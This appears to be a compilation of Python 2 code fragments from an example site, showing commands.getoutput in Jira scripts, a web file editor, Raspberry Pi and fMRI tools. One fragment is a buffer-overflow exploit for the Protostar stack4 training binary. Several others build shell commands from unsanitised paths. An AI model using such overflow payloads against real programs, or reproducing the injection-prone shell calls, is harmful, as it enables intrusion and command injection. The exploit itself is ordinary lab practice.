if not 'OutputPedAutoCorrPoolFileDir' in dir():
   OutputPedAutoCorrPoolFileDir  = commands.getoutput("pwd")

if not 'ACLArCalibFolderTag' in dir():
   rs=FolderTagResover()
   ACLArCalibFolderTag = rs.getFolderTagSuffix(LArCalib_Flags.LArPhysAutoCorrFolder)
   del rs #Close DB connection
   
   
if not 'OutputDB' in dir():
   OutputDB = LArCalib_Flags.OutputDB

if 'OutputSQLiteFile' in dir():
   OutputDB = DBConnectionFile(OutputSQLiteFile)   
Beispiel #33
0
    if Leer_Estado(20) == '1': # inicio de actualizacion primeros pasos
        print 'actualizacion pendiente'
        
        Log_Actualizador('0. Preparando actualizacion.')
        Log_Actualizador('0.1 Detener Firmware Actual.')
        res16 = Leer_Archivo(16)
        Desactivar_Trabajos(res16)        
        Log_Actualizador('0.2 Activar vista Actualizacion.')
        Activar_Trabajo('Actualizador')
        Log_Actualizador('0.3 Activar proceso Actualizacion.')
        Activar_Trabajo('Proceso_Actualizar')

        Log_Actualizador('0.4 Reiniciando el Dispostivo.')
        Borrar(20)              # Borrar QR
        Escrivir_Estados('2',20)   # Guardar QR
        commands.getoutput('sudo reboot')
    if Leer_Estado(20) == '2':
        print 'Actualizando El dispostivo'
    if Leer_Estado(20) == '3':
        print 'Fin de Actualizar el dispostivo'
    if Leer_Estado(20) == '4':
        print 'Error en la actualizacion'
        
        res16 = Leer_Archivo(16)
        Activar_Trabajos(res16)
        Desactivar_Trabajo('Actualizador')
        #Log_Actualizador('0.3 Activar proceso Actualizacion.')
        Desactivar_Trabajo('Proceso_Actualizar')
        Borrar(20)              # Borrar QR
        Escrivir_Estados('5',20)   # Guardar QR
        commands.getoutput('sudo reboot')
Beispiel #34
0
def _get_phpmd(path, rules):
    command = "%s/php-bin/phpmd %s text %s " % (base_path, path, rules)
    errors = getoutput(command).split("\n")
    return [error for error in errors if error]
Beispiel #35
0
def _get_errors(path):
    errors = getoutput("php -l  %s" % (path)).split("\n")

    return [error for error in errors if error]
 def capture_frame():
     cmd = 'date +"%Y-%m-%d_%H_%M"'
     date = commands.getoutput(cmd)
     with picamera.PiCamera() as cam:
         time.sleep(2)
         cam.capture(img_base + date + '.jpg')
    door_contact = 14
    window_contact = 15
    pir_contact = 18
    light_contact = 17

    GPIO.setmode(GPIO.BCM)
    GPIO.setup(door_contact, GPIO.IN)
    GPIO.setup(window_contact, GPIO.IN)
    GPIO.setup(pir_contact, GPIO.IN)
    GPIO.setup(light_contact, GPIO.OUT)

    prev_input_door = 1
    prev_input_window = 1
    prev_input_pir = 1
    shl_cmd = 'readlink -f $(dirname LKR0.00)'
    base_path = commands.getoutput(shl_cmd)
    img_base = base_path + '/images/'
    api_call_script = base_path + '/api_calls.sh'

    #Turn off the light at startup
    print 'Light: Off'
    #GPIO.output(light_contact,1)
    GPIO.output(light_contact, 0)

    def capture_frame():
        cmd = 'date +"%Y-%m-%d_%H_%M"'
        date = commands.getoutput(cmd)
        with picamera.PiCamera() as cam:
            time.sleep(2)
            cam.capture(img_base + date + '.jpg')
            #time.sleep(5)
Beispiel #38
0
        try:
            commands.getoutput(''' ssh shipcbt "date -s '%s'" ''' % data)
            return Response(json.dumps({
                'result': True,
                "message": u'设置成功'
            }),
                            mimetype='application/json')
        except Exception, e:
            return Response(json.dumps({
                'result': True,
                "message": u'设置失败。{0}'.format(e)
            }),
                            mimetype='application/json')
    #else:
    #return redirect(index)
    current_tiem = commands.getoutput('''ssh shipcbt "date +%F\ %T" ''')
    return render_template('settime.html', current_tiem=current_tiem)


############################################################


@main.route('/clean_cache', methods=['GET', 'POST'])
@login_required
def clean_cache():
    '''
    @note 缓存清理
    '''
    # action = ''
    result = commands.getoutput(
        '''ssh  shipcbt "/bin/bash /root/switch_register.sh check" ''')
Beispiel #39
0
def createfeaturetest():
    print "start to create feature in jira"
    fname = "feature.xlsx"
    bk = xlrd.open_workbook(fname)

    # 获取用户名密码
    try:
        login = bk.sheet_by_name("login")
    except:
        print "no sheet in %s named login , can't login jira without it" % fname

    rowl = login.row_values(1)
    jira = JIRA('http://10.3.11.103:80/', basic_auth=(rowl[0], rowl[1]))
    project = rowl[2]
    print project
    # 获取需求信息
    try:
        sh = bk.sheet_by_name("info")
    except:
        print "no sheet in %s named info" % fname
    # 获取行数
    nrows = sh.nrows
    # 获取列数
    ncols = sh.ncols
    print "nrows %d, ncols %d" % (nrows, ncols)

    for i in range(1, nrows):
        rowd = sh.row_values(i)
        print rowd[0], rowd[1], rowd[2], rowd[3], rowd[4], rowd[5], rowd[
            6], rowd[7], rowd[8], rowd[9]
        issue_dict = {
            'project': {
                "key": project
            },
            'issuetype': {
                'name': "软件需求"
            },
            'summary': str(rowd[0]),
            'description': str(rowd[1]),
            'customfield_19101': {
                'value': rowd[2],
                'child': {
                    'value': rowd[3]
                }
            },  # 领域和模块
            # 'customfield_17302': {'value': rowd[2]},  # 领域
            # 'components': [{'name': rowd[3]}],  # 模块
            'customfield_19105': {
                'value': rowd[4]
            },  # 功能点
            'customfield_19102': {
                'value': rowd[5]
            },  # 需求状态
            'customfield_19103': {
                'value': rowd[6],
                'child': {
                    'value': rowd[7]
                }
            },  #需求来源2
            'customfield_19104': str(rowd[8]),  # 需求编号
            # 'assignee': {'name': rowd[9]},#处理人
        }

        try:
            new_issue = jira.create_issue(fields=issue_dict)
            print new_issue
        except BaseException, e:
            print "create error in %d" % (i + 1)
            e = str(e).split(":")[-1].strip()
            cmd = "cat %s |tail -1" % (e)
            faillog = commands.getoutput(cmd)
            print faillog
Beispiel #40
0
def editor():
    form = EditorForm()
    if form.validate_on_submit():
        param_do = form.do_action.data
        print param_do
        file_path = form.file_path.data
        (file_stat_code,
         file_stat) = commands.getstatusoutput("stat %s " % file_path)
        if param_do == "read":

            # 判断文件是否存在
            if not os.access(file_path, os.F_OK):
                #print file_stat_dis
                flash("【ERROR:】该文件 %s 不存在" % file_path, "danger")
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_stat=file_stat,
                                       file_stat_dis=False)
            # 判断文件是否可读
            elif not os.access(file_path, os.R_OK):
                flash("【ERROR:】该文件 %s 不可读" % file_path, "danger")
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_stat=file_stat,
                                       file_stat_dis=False)
            # 判断文件是否可写
            elif not os.access(file_path, os.W_OK):
                flash("【ERROR:】该文件 %s 只可读不可写" % file_path, "warning")
                with open(file_path, 'rb') as f:
                    file_data = f.read()
                    f.closed
                form.file_data.data = file_data
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_stat=file_stat,
                                       file_stat_dis=True)
            #读取文件
            else:
                with open(file_path, 'rb') as f:
                    file_data = f.read()
                    f.closed
                form.file_data.data = file_data
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_stat=file_stat,
                                       file_stat_dis=True)
        # 保存文件
        if param_do == 'save':
            file_access = os.access(file_path, os.W_OK)
            if not file_access:
                flash("【ERROR:】该文件 %s 只可读不可写" % file_path, "danger")
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_access=file_access,
                                       file_stat=file_stat,
                                       file_stat_dis=False)
            # 比较文件md5 如果相同则判断为文件未发生改变
            file_md5sum = md5(open(file_path, 'rb').read()).hexdigest()
            form_md5sum = md5(form.file_data.data.replace('\r\n',
                                                          '\n')).hexdigest()
            if file_md5sum == form_md5sum:
                flash("【NOTICE:】该文件 %s 未发生改变" % file_path, "info")
                return render_template('editor.html',
                                       form=form,
                                       file_path=file_path,
                                       file_access=file_access,
                                       file_stat=file_stat,
                                       file_stat_dis=True)
            # 文件备份
            postfix = time.strftime("%Y%m%d%H%M%S")
            file_backup = file_path + "." + postfix
            (rescode, result) = commands.getstatusoutput(
                "cp -p {0} {1}".format(file_path, file_backup))

            if rescode == 0:
                # dos2unix
                commands.getoutput("dos2unix %s" % file_path)
                flash("【SUCCESS】: 成功保存修改并备份文件为:  %s" % file_backup, "success")
            else:
                flash("【ERROR:】该文件 %s 备份失败" % file_path, "danger")
            file = open(file_path, 'wb')
            file.write(form.file_data.data.replace('\r\n', '\n'))
            file.close()

            return render_template('editor.html',
                                   form=form,
                                   file_path=file_path,
                                   file_access=file_access,
                                   file_stat=file_stat,
                                   file_stat_dis=False)
    return render_template('editor.html', form=form)
Beispiel #41
0
def createbug():
    print "start to create bug in jira"
    fname = "bug.xlsx"
    bk = xlrd.open_workbook(fname)

    #获取用户名密码
    try:
        login = bk.sheet_by_name("login")
    except:
        print "no sheet in %s named login , can't login jira without it" % fname

    rowl = login.row_values(1)
    jira = JIRA('http://jira.zeusis.com', basic_auth=(rowl[0], rowl[1]))

    #get bug info and create
    try:
        sh = bk.sheet_by_name("info")
    except:
        print "no sheet in %s named info" % fname
    #获取行数
    nrows = sh.nrows
    #获取列数
    ncols = sh.ncols
    print "nrows %d, ncols %d" % (nrows, ncols)

    for i in range(1, nrows):
        rowd = sh.row_values(i)
        issue_dict = {
            'project': {
                "key": rowd[0]
            },
            'issuetype': {
                'name': "缺陷"
            },
            'summary': str(rowd[1]),
            'description': str(rowd[2]),
            'customfield_17302': {
                'value': rowd[3]
            },  #领域
            'components': [{
                'name': rowd[4]
            }],  #模块
            'assignee': {
                'name': rowd[5]
            },
            'versions': [{
                'name': rowd[6]
            }],
            'customfield_15121': {
                'value': rowd[7]
            },
        }
        try:
            new_issue = jira.create_issue(fields=issue_dict)
            print new_issue
        except BaseException, e:
            print "create error in %d" % (i + 1)
            e = str(e).split(":")[-1].strip()
            cmd = "cat %s |tail -1" % (e)
            faillog = commands.getoutput(cmd)
            print faillog
Beispiel #42
0
def createfeaturezhengshi():
    print "start to create feature in jira"
    fname = "feature.xlsx"
    bk = xlrd.open_workbook(fname)

    # 获取用户名密码
    try:
        login = bk.sheet_by_name("login")
    except:
        print "no sheet in %s named login , can't login jira without it" % fname

    rowl = login.row_values(1)
    if isinstance(rowl[0], float) and rowl[0] == int(rowl[0]):
        rowl[0] = int(rowl[0])
    if isinstance(rowl[1], float) and rowl[1] == int(rowl[1]):
        rowl[1] = int(rowl[1])
    jira = JIRA('http://jira.ccdomain.com:80/', basic_auth=(rowl[0], rowl[1]))
    project = rowl[2]
    print project
    # 获取需求信息
    try:
        sh = bk.sheet_by_name("info")
    except:
        print "no sheet in %s named info" % fname
    # 获取行数
    nrows = sh.nrows
    # 获取列数
    ncols = sh.ncols
    print "nrows %d, ncols %d" % (nrows, ncols)

    for i in range(1, nrows):
        rowd = sh.row_values(i)
        print rowd[0], rowd[1], rowd[2], rowd[3], rowd[4], rowd[5], rowd[
            6], rowd[7], rowd[8]
        if project == 'PSR':
            issue_dict = {
                'project': {
                    "key": project
                },
                'issuetype': {
                    'name': "软件需求"
                },
                'customfield_19105': {
                    'value': rowd[0]
                },  # 需求的来源
                'customfield_19106': {
                    'value': rowd[1]
                },  # 需求版本号
                'customfield_19102': str(rowd[2]),  # 运营商需求编号
                'customfield_17302': {
                    'value': rowd[3]
                },  # 领域
                'components': [{
                    'name': rowd[4]
                }],  # 模块
                'customfield_19100': str(rowd[5]),  # 一级需求
                'summary': str(rowd[6]),
                'description': str(rowd[7]),
                # 'customfield_19101': {'value': rowd[2], 'child': {'value': rowd[3]}},  # 领域和模块
                'customfield_19104': {
                    'value': rowd[8]
                },  # 需求是否有效

                # 'customfield_19101': {'value': rowd[6],'child':{'value':rowd[7]}},  #需求的来源

                # 'assignee': {'name': rowd[9]},#处理人
            }
        else:
            issue_dict = {
                'project': {
                    "key": project
                },
                'issuetype': {
                    'name': "软件需求"
                },
                'customfield_19105': {
                    'value': rowd[0]
                },  # 需求的来源
                'customfield_19106': {
                    'value': rowd[1]
                },  # 需求版本号
                'customfield_19102': str(rowd[2]),  # 运营商需求编号
                'customfield_17302': {
                    'value': rowd[3]
                },  # 领域
                'components': [{
                    'name': rowd[4]
                }],  # 模块
                'customfield_19100': str(rowd[5]),  # 一级需求
                'summary': str(rowd[6]),
                'description': str(rowd[7]),
                # 'customfield_19101': {'value': rowd[2], 'child': {'value': rowd[3]}},  # 领域和模块
                # 'customfield_19104': {'value': rowd[8]},  # 需求是否有效

                # 'customfield_19101': {'value': rowd[6], 'child': {'value': rowd[7]}},  # 需求的来源

                # 'assignee': {'name': rowd[9]},#处理人
            }

        try:
            new_issue = jira.create_issue(fields=issue_dict)
            print new_issue
        except BaseException, e:
            print e
            print "create error in %d" % (i + 1)
            e = str(e).split(":")[-1].strip()
            cmd = "cat %s |tail -1" % (e)
            faillog = commands.getoutput(cmd)
            print faillog
Beispiel #43
0
# Define the FSL-bin directory
fslDir = os.path.join(os.environ["FSLDIR"], 'bin', '')

# Create output directory if needed
if not os.path.isdir(outDir):
    os.makedirs(outDir)

# Get TR of the fMRI data, if not specified
if args.TR:
    TR = args.TR
else:
    cmd = ' '.join([
        os.path.join(fslDir, 'fslinfo'), inFile,
        '| grep pixdim4 | awk \'{print $2}\''
    ])
    TR = float(commands.getoutput(cmd))

# Check TR
if TR == 1:
    print 'Warning! Please check whether the determined TR (of ' + str(
        TR) + 's) is correct!\n'
elif TR == 0:
    print 'TR is zero. ICA-AROMA requires a valid TR and will therefore exit. Please check the header, or define the TR as an additional argument.\n----------------------------- ICA-AROMA IS CANCELED -----------------------------\n'

# Define/create mask. Either by making a copy of the specified mask, or by creating a new one.
mask = os.path.join(outDir, 'mask.nii.gz')
if args.mask:
    shutil.copyfile(args.mask, mask)
else:
    # If a Feat directory is specified, and an example_func is present use example_func to create a mask
    if args.inFeat and os.path.isfile(
Beispiel #44
0
def createfeature():
    print "start to create feature in jira"
    fname = "feature.xlsx"
    bk = xlrd.open_workbook(fname)

    #获取用户名密码
    try:
        login = bk.sheet_by_name("login")
    except:
        print "no sheet in %s named login , can't login jira without it" % fname

    rowl = login.row_values(1)
    jira = JIRA('http://jira.zeusis.com', basic_auth=(rowl[0], rowl[1]))

    #获取需求信息
    try:
        sh = bk.sheet_by_name("info")
    except:
        print "no sheet in %s named info" % fname
    #获取行数
    nrows = sh.nrows
    #获取列数
    ncols = sh.ncols
    print "nrows %d, ncols %d" % (nrows, ncols)

    for i in range(1, nrows):
        rowd = sh.row_values(i)
        if rowd[8] == u'\u65e0':
            issue_dict = {
                'project': {
                    "id": "12400"
                },
                'issuetype': {
                    'name': "软件需求"
                },
                'summary': str(rowd[0]),
                'description': str(rowd[1]),
                'customfield_17302': {
                    'value': rowd[2]
                },  #领域
                'components': [{
                    'name': rowd[3]
                }],  #模块
                'customfield_16107': [{
                    'value': rowd[4]
                }],  #产品
                'customfield_16115': {
                    'name': rowd[5]
                },  #软件经理
            }
        else:
            issue_dict = {
                'project': {
                    "id": "12400"
                },
                'issuetype': {
                    'name': "软件需求"
                },
                'summary': str(rowd[0]),
                'description': str(rowd[1]),
                'customfield_17302': {
                    'value': rowd[2]
                },  #领域
                'components': [{
                    'name': rowd[3]
                }],  #模块
                'customfield_16107': [{
                    'value': rowd[4]
                }],  #产品
                'customfield_16115': {
                    'name': rowd[5]
                },  #软件经理
                'customfield_16617': {
                    'value': rowd[6]
                },
            }
        try:
            new_issue = jira.create_issue(fields=issue_dict)
            print new_issue
        except BaseException, e:
            print "create error in %d" % (i + 1)
            e = str(e).split(":")[-1].strip()
            cmd = "cat %s |tail -1" % (e)
            faillog = commands.getoutput(cmd)
            print faillog
 def isRunning(self):
     if self.iface:
         return True
     if len(commands.getoutput("audtool2 version")) > 0:
         return True
     return False
Beispiel #46
0
def main():
    """
creates multiple posfiles based on a 'report_match_only' flag from a matching log file
	"""

    parser = OptionParser()
    parser.add_option("-l", dest="log", help="log")
    parser.add_option("-b", dest="base", help="base file name")
    parser.set_description(main.__doc__)
    (options, args) = parser.parse_args()

    if not options.log or not options.base:
        parser.print_help()
        sys.exit()

    pos0 = options.base + ".pos0"
    pos1 = options.base + ".pos1"
    pos2 = options.base + ".pos2"
    pos3 = options.base + ".pos3"
    pos4 = options.base + ".pos4"

    cmd0 = "grep 'match f' " + options.log + " | sort -n +2 | uniq | grep ': 1' | awk '{print $5}' | sort -n | uniq"
    cmd1 = "grep 'match f' " + options.log + " | sort -n +2 | uniq | grep ': 2' | awk '{print $5}' | sort -n | uniq"
    cmd2 = "grep 'match f' " + options.log + " | sort -n +2 | uniq | grep ': 3' | awk '{print $5}' | sort -n | uniq"
    cmd3 = "grep 'match f' " + options.log + " | sort -n +2 | uniq | grep ': 4' | awk '{print $5}' | sort -n | uniq"
    cmd4 = "grep 'match f' " + options.log + " | sort -n +2 | uniq | grep ': 5' | awk '{print $5}' | sort -n | uniq"

    ans0 = commands.getoutput(cmd0)
    ans1 = commands.getoutput(cmd1)
    ans2 = commands.getoutput(cmd2)
    ans3 = commands.getoutput(cmd3)
    ans4 = commands.getoutput(cmd4)

    c0 = ans0.split()
    if len(c0) > 0:
        FILE0 = open(pos0, 'w')
        for x in c0:
            FILE0.write(x + " ")
        FILE0.write("\n")
        FILE0.close()

    c1 = ans1.split()
    if len(c1) > 0:
        FILE1 = open(pos1, 'w')
        for x in c1:
            FILE1.write(x + " ")
        FILE1.write("\n")
        FILE1.close()

    c2 = ans2.split()
    if len(c2) > 0:
        FILE2 = open(pos2, 'w')
        for x in c2:
            FILE2.write(x + " ")
        FILE2.write("\n")
        FILE2.close()

    c3 = ans3.split()
    if len(c3) > 0:
        FILE3 = open(pos3, 'w')
        for x in c3:
            FILE3.write(x + " ")
        FILE3.write("\n")
        FILE3.close()

    c4 = ans4.split()
    if len(c4) > 0:
        FILE4 = open(pos4, 'w')
        for x in c4:
            FILE4.write(x + " ")
        FILE4.write("\n")
        FILE4.close()
Beispiel #47
0
def view(table="emotiw_mlp_audio",
         tag="rbm1",
         user="******",
         password="",
         database="dauphiya_db",
         host="opter.iro.umontreal.ca"):
    """
    View all the jobs in the database.
    """
    import commands
    import sqlalchemy
    import psycopg2

    # Update view
    url = "postgres://%s:%s@%s/%s/" % (user, password, host, database)
    commands.getoutput("jobman sqlview %s%s %s_view" % (url, table, table))

    # Display output
    def connect():
        return psycopg2.connect(user=user,
                                password=password,
                                database=database,
                                host=host)

    engine = sqlalchemy.create_engine('postgres://', creator=connect)
    conn = engine.connect()
    experiments = sqlalchemy.Table('%s_view' % table,
                                   sqlalchemy.MetaData(engine),
                                   autoload=True)

    columns = [
        experiments.columns.id,
        experiments.columns.jobman_status,
        experiments.columns.tag,
        experiments.columns.nhiddens,
        experiments.columns.learningrate,
        experiments.columns.momentum,
        experiments.columns.features,
        experiments.columns.exampledropout,
        experiments.columns.nlayers,
        experiments.columns.trainerror,
        experiments.columns.validerror,
    ]

    results = sqlalchemy.select(columns,
                                order_by=[
                                    experiments.columns.tag,
                                    sqlalchemy.desc(
                                        experiments.columns.validerror)
                                ]).execute()
    results = [map(lambda x: x.name, columns)] + list(results)

    def get_max_width(table, index):
        """Get the maximum width of the given column index"""
        return max([len(format_num(row[index])) for row in table])

    def format_num(num):
        """Format a number according to given places.
        Adds commas, etc. Will truncate floats into ints!"""
        try:
            if "." in num:
                return "%.7f" % float(num)
            else:
                return int(num)
        except (ValueError, TypeError):
            return str(num)

    col_paddings = []

    for i in range(len(results[0])):
        col_paddings.append(get_max_width(results, i))

    for row_num, row in enumerate(results):
        for i in range(len(row)):
            col = format_num(row[i]).ljust(col_paddings[i] + 2) + "|"
            print col,
        print

        if row_num == 0:
            for i in range(len(row)):
                print "".ljust(col_paddings[i] + 1, "-") + " +",
            print
Beispiel #48
0
#!/usr/bin/python
import cgi;
import cgitb;
import time
cgitb.enable()
import commands
import sys
import string
print "Content-type: text/html\n\n";
mytemp1 = commands.getoutput('/opt/vc/bin/vcgencmd measure_temp | cut -d "=" -f2 | cut -f1')
output = "Pi CPU Temp is: " + mytemp1
print output
Beispiel #49
0
    def run(self):
        # remove /usr for bdist/bdist_rpm
        match = re.search('(build/[^/]+/dumb)/usr', self.install_dir)
        if match != None:
            self.install_dir = re.sub(match.group(0), match.group(1),
                                      self.install_dir)
        # remove /var/tmp/*-buildroot for bdist_rpm
        match = re.search('(/var/tmp/.*-buildroot)/usr', self.install_dir)
        if match != None:
            self.install_dir = re.sub(match.group(0), match.group(1),
                                      self.install_dir)
        # create tmp area
        tmpDir = 'build/tmp'
        self.mkpath(tmpDir)
        new_data_files = []

        for destDir, dataFiles in self.data_files:
            newFilesList = []
            for srcFile in dataFiles:
                # check extension
                if not srcFile.endswith(
                        '-template') and not self.is_expected_extension(
                            srcFile):
                    raise RuntimeError, "%s doesn't have the -template extension" % srcFile
                # dest filename
                destFile = re.sub('(\.exe)*\-template$', '', srcFile)
                destFile = destFile.split('/')[-1]
                destFile = '%s/%s/%s' % (tmpDir, srcFile, destFile)
                # open src
                inFile = open(srcFile)
                # read
                filedata = inFile.read()
                # close
                inFile.close()
                # replace patterns
                if not self.is_expected_extension(srcFile):
                    for item in re.findall('@@([^@]+)@@', filedata):
                        if not hasattr(
                                self, item) and not self.is_expected_extension(
                                    srcFile):
                            raise RuntimeError, 'unknown pattern %s in %s' % (
                                item, srcFile)
                        # get pattern
                        patt = getattr(self, item)
                        # remove build/*/dump for bdist
                        patt = re.sub('build/[^/]+/dumb', '', patt)
                        # remove /var/tmp/*-buildroot for bdist_rpm
                        patt = re.sub('/var/tmp/.*-buildroot', '', patt)
                        # replace
                        filedata = filedata.replace('@@%s@@' % item, patt)
                # write to dest
                if not os.path.exists(os.path.dirname(destFile)):
                    os.makedirs(os.path.dirname(destFile))
                oFile = open(destFile, 'w')
                oFile.write(filedata)
                oFile.close()
                # chmod for exe
                if srcFile.endswith('.exe-template'):
                    commands.getoutput('chmod +x %s' % destFile)
                # append
                newFilesList.append(destFile)
            # replace dataFiles to install generated file
            new_data_files.append((destDir, newFilesList))
        # install
        self.data_files = new_data_files
        install_data_org.run(self)
 def isPlaying(self):
     if self.iface:
         return self.iface.Status(
         ) == "playing"  #Note: self.iface.Playing() returns True even if it's paused
     else:
         return commands.getoutput("audtool2 playback-status") == "playing"
Beispiel #51
0
def rdaxi(addr):
    value=commands.getoutput("./../lib/rdaxi " + str(addr))
    read_data = int(value, 16);
    value = hex(read_data & int("0xffffffff", 16))
    return value
Beispiel #52
0
def bulidIPA():
    #打包之前先删除packBagPath下的文件夹
    commands.getoutput('rm -rf %s' % packBagPath)
    #创建PayLoad文件夹
    mkdir(PayLoadPath)
    #将app拷贝到PayLoadPath路径下
    commands.getoutput('cp -r %s %s' % (appFileFullPath, PayLoadPath))
    #在桌面上创建packBagPath的文件夹
    commands.getoutput('mkdir -p %s' % packBagPath)
    #将PayLoadPath文件夹拷贝到packBagPath文件夹下
    commands.getoutput('cp -r %s %s' % (PayLoadPath, packBagPath))
    #删除桌面的PayLoadPath文件夹
    commands.getoutput('rm -rf %s' % (PayLoadPath))
    #切换到当前目录
    os.chdir(packBagPath)
    #压缩packBagPath文件夹下的PayLoadPath文件夹夹
    commands.getoutput('zip -r ./Payload.zip .')
    print "\n*************** 打包成功 *********************\n"
    #将zip文件改名为ipa
    commands.getoutput('mv Payload.zip Payload.ipa')
    #删除payLoad文件夹
    commands.getoutput('rm -rf ./Payload')
Beispiel #53
0
 def cmd(self, cmd):
     """send a command and return a array for each line
     """
     #        return [x.strip() for x in os.popen(cmd).readlines()]
     return [x.strip() for x in commands.getoutput(cmd).split('\n')]
Beispiel #54
0
}
</style>
<body>
<div class="container">
<h2></h2>
<p></p>
'''
print yyy
print '<pre>'
#f=open('i','w')
#f.write( commands.getoutput('sudo aws ec2 describe-instances | grep PublicIpAddress | grep -o -P "\d+\.\d+\.\d+\.\d+" | grep -v "^10\."'))
#print commands.getoutput('sudo aws ec2 describe-instances --region us-west-2 --output table')
#print commands.getoutput('sudo aws ec2 describe-instances | grep PublicIpAddress | grep -o -P "\d+\.\d+\.\d+\.\d+" | grep -v "^10\."')
#print commands.getoutput('aws ec2 run-instances --image-id ami-6f68cf0f --count 1 --instance-type t2.micro --key-name 2ndjune --security-group-ids launch-wizard-5 --region us-west-2')
#f.close()
kk= commands.getoutput(' sudo docker run -itd -v /var/www/html/upload:/var/www/html/upload 4cf714dd5507 ')
print kk
f=open('dockernamenode','w')
f.write(kk)
f.close()
print '</pre>'
print '<div class="container">'
print '<form method="post" action="/dockerdata1.html">'
print '<label>'
print '<input type="submit" value="Click to Start the creation of Data nodes!!">'
print '</label>'
print '</form>'
print '</div>'


Beispiel #55
0
#!/usr/bin/python
# objdump reports 080483f4, exploit works in GDB, but segfault keeps python from printing result

import commands

# Path to binary
command = '/opt/protostar/bin/stack4'

# Pattern to find EIP - 128 bytes
pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae'
# EIP found at 0x63413563, or offset 76

# Create new file write buffer to file
file = open('buffer', 'w+')
buffer = 'A' * 76 + '\xf4\x83\x04\x08'
file.write(buffer)
file.close()

# String to execiute command and send buffer file as input
line = command + " < buffer"

# Execute the command with the current buffer
output = commands.getoutput(line)
print(output)
import Adafruit_BBIO.GPIO as GPIO
import Adafruit_BBIO.PWM as PWM
import Adafruit_BBIO.ADC as ADC
from Adafruit_CharLCD import Adafruit_CharLCD
from NokiaLCD import NokiaLCD
from collections import OrderedDict
import commands
import json
import time

#import game libraries
from gamelibs import config_manager
from gamelibs import lcd_manager

#Who am I? Get my ip address
ipaddress = commands.getoutput("/sbin/ifconfig").split("\n")[1].split()[1][5:]

#configuration. Load the config and get various dictionaries and arrays back
configFileName = 'game-' + ipaddress +'.config'
config, controlids, controldefs, sortedlist = config_manager.loadConfig(configFileName)

#initialise all of the LCDs and return a list of LCD objects
myLcdManager = lcd_manager.LcdManager(sortedlist, config)

for ctrlid in controlids:
    myLcdManager.display(str(config['local']['controls'][ctrlid]['display']['pin']) + " (" + str(ctrlid) + ")", config['local']['controls'][ctrlid]['display']['width'], ctrlid)
    
#Main loop
while(True):
	pass
Beispiel #57
0
def main():

    # Log file handle
    global log

    # Globals relating to command line options
    global logging, vdiffs, reportAllSects

    # Named temporary files / directories
    global tmpDir1, tmpDir2

    # Command paths
    global lintdump_cmd, elfdump_cmd, dump_cmd, dis_cmd, od_cmd, diff_cmd, sqlite_cmd

    # Default search path
    global wsdiff_path

    # Essentially "uname -p"
    global arch

    # changed files for worker thread processing
    global changedFiles
    global baseRoot
    global ptchRoot

    # Sort the list of files from a temporary file
    global sorted
    global differentFiles

    # Debugging indicator
    global debugon

    # Some globals need to be initialized
    debugon = logging = vdiffs = reportAllSects = sorted = False

    # Process command line arguments
    # Return values are returned from args() in alpha order
    # (Yes, python functions can return multiple values (ewww))
    # Note that args() also set the globals:
    #	logging to True if verbose logging (to a file) was enabled
    #	vdiffs to True if logged differences aren't to be truncated
    #	reportAllSects to True if all ELF section differences are to be reported
    #
    baseRoot, fileNamesFile, localTools, ptchRoot, results = args()

    #
    # Set up the results/log file
    #
    if logging:
        try:
            log = open(results, "w")
        except:
            logging = False
            error("failed to open log file: " + log)
            sys.exit(1)

        dateTimeStr = "# %04d-%02d-%02d at %02d:%02d:%02d" % time.localtime(
        )[:6]
        v_info("# This file was produced by wsdiff")
        v_info(dateTimeStr)

    # Changed files (used only for the sorted case)
    if sorted:
        differentFiles = []

    #
    # Build paths to the tools required tools
    #
    # Try to look for tools in $SRC/tools if the "-t" option
    # was specified
    #
    arch = commands.getoutput("uname -p")
    if localTools:
        try:
            src = os.environ['SRC']
        except:
            error("-t specified, but $SRC not set. Cannot find $SRC/tools")
            src = ""
        if len(src) > 0:
            wsdiff_path.insert(0, src + "/tools/proto/opt/onbld/bin")

    lintdump_cmd = find_tool("lintdump")
    elfdump_cmd = find_tool("elfdump")
    dump_cmd = find_tool("dump")
    od_cmd = find_tool("od")
    dis_cmd = find_tool("dis")
    diff_cmd = find_tool("diff")
    sqlite_cmd = find_tool("sqlite")

    #
    # Set resource limit for number of open files as high as possible.
    # This might get handy with big number of threads.
    #
    (nofile_soft, nofile_hard) = resource.getrlimit(resource.RLIMIT_NOFILE)
    try:
        resource.setrlimit(resource.RLIMIT_NOFILE, (nofile_hard, nofile_hard))
    except:
        error("cannot set resource limits for number of open files")
        sys.exit(1)

    #
    # validate the base and patch paths
    #
    if baseRoot[-1] != '/':
        baseRoot += '/'

    if ptchRoot[-1] != '/':
        ptchRoot += '/'

    if not os.path.exists(baseRoot):
        error("old proto area: " + baseRoot + " does not exist")
        sys.exit(1)

    if not os.path.exists(ptchRoot):
        error("new proto area: " + ptchRoot + \
              " does not exist")
        sys.exit(1)

    #
    # log some information identifying the run
    #
    v_info("Old proto area: " + baseRoot)
    v_info("New proto area: " + ptchRoot)
    v_info("Results file: " + results + "\n")

    #
    # Set up the temporary directories / files
    # Could use python's tmpdir routines, but these should
    # be easier to identify / keep around for debugging
    pid = os.getpid()
    tmpDir1 = "/tmp/wsdiff_tmp1_" + str(pid) + "/"
    tmpDir2 = "/tmp/wsdiff_tmp2_" + str(pid) + "/"
    try:
        os.makedirs(tmpDir1)
    except OSError, e:
        error("main: makedir failed %s" % e)
Beispiel #58
0
def copy_file(x,y):
  print "hould copy"
  commands.getoutput("cp /data/sep/bob/test/data.big.json.dat /data/sep/bob/test/data.big.%d.%d.json.dat"%(x,y));
Beispiel #59
0
if __name__=="__main__":
    doc=os.path.basename(sys.argv[0])+""" base64Converter.x
    This script tests the conversion of reals to base64.
    You have to give the executable obtained by compiling convertBase64.F90
    as argument to this script"""

